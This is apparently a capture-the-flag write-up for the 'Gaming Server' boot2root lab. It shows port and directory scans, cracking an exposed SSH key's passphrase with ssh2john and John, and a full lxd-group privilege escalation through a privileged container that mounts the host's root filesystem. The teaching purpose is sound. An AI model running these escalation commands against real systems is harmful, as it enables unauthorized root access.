Page cover image

Gaming Server

Una maquina Boot2root facil para principiantes.

Recon

We start with a port scan using nmap

$nmap -sCV --min-rate 5000 -p22,80 -Pn 10.10.192.142 -oN targeted
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-04 11:44 -03
Nmap scan report for 10.10.192.142
Host is up (0.41s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.40 seconds

To begin with, let's take a look at the source code of the page where we find a comment from the devs

With this it can be deduced that there is a user john.

Investigating a little more we see that it has a directory /uploads which contains a dict.lst which appears to be a dictionary with passwords.

Using Gobuster we see another directory /secrets which has an RSA key

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.192.142
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/04 11:52:08 Starting gobuster in directory enumeration mode
===============================================================
/secret               (Status: 301) [Size: 315] [--> http://10.10.192.142/secret/]
/uploads              (Status: 301) [Size: 316] [--> http://10.10.192.142/uploads/]
Progress: 959 / 960 (99.90%)
===============================================================
2023/07/04 11:52:47 Finished
===============================================================

We copy the key to our machine and give it permissions with: chmod 600 id_rsa.

With this key we can try to login via ssh with ssh -i id_rsa john@10.10.192.142 but it asks for the password.

Taking into account that we have a dictionary with possible passwords we can use ssh2john

ssh2john id_rsa > hash

And then using john and the dictionary, we can crack the key that was used with the RSA key.

Privilege Escalation

Now we can log in via ssh and start with the privilege escalation.

Obtenemos la primer flag

With the id command we can see that we are part of the lxd group and doing some research on the internet we can see that we are able to escalate privileges thanks to this group.

In our machine

sudo su
# Instalamos los requerimientos
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
# Clonamos el repo
git clone https://github.com/lxc/distrobuilder
# Make distrobuilder
cd distrobuilder
make
# Preparamos la creacion de alphine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# Creamos el container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

Then, we upload the files lxd.tar.xz and rootfs.squashfs to the vulnerable machine.

We add the images

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list # Podemos ver la nueva iimagen importada

We create a container and add the root path

lxc init alpine privesc -c security.privileged=true
lxc list #Listamos el container

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

We run the container:

lxc start privesc
lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root # Aca es donde esta montado todo el equipo victima 

And that's it, we should now have root privileges.

If any part of the privilege escalation doesn't work for you, here is the repository so you can investigate for yourselves Hacktricks Github.

Last updated

Was this helpful?